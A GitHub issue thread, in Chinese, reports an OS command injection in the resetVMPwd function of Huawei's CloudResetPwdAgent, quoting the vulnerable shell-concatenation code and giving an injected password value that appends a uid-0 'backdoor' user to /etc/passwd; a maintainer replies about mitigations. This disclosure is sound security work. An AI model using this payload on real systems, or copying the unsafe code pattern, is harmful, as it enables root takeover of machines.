### ISSUE TITLE
ResetPwdFlow.java文件中resetVMPwd函数存在OS命令注入漏洞

### ISSUE THREAD

**Issue by fakefishinsky** [Huawei/CloudResetPwdAgent#1]
文件：resetPwdAgent_linux/resetPwdAgentCode/src/main/java/ResetPwdFlow.java
函数：private void resetVMPwd(String password) {
                 ......
                 String[] cmds = new String[]{"/bin/sh", "-c", "echo root:" + password + "|chpasswd"}; //这里存在os命令注入漏洞
                 p = rt.exec(cmds);
            ......
            }
如果password为 abc;echo backdoor:x:0:0::/:/bin/bash>>/etc/passwd;echo root:abc
则最终会执行：
/bin/sh -c echo root:abc;echo backdoor:x:0:0::/:/bin/bash>>/etc/passwd;echo root:abc|chpasswd
就会在系统中创建一个uid为0的恶意用户backdoor

另外，在有些系统上（如suse11sp3），使用chpasswd设置用户密码会使用不安全的加密算法（des）

**Comment by archerslaw** [comment]
前端和api有做放注入风险拦截，不过后端已改成8位随机盐值sha512方式单向hash了，谢谢
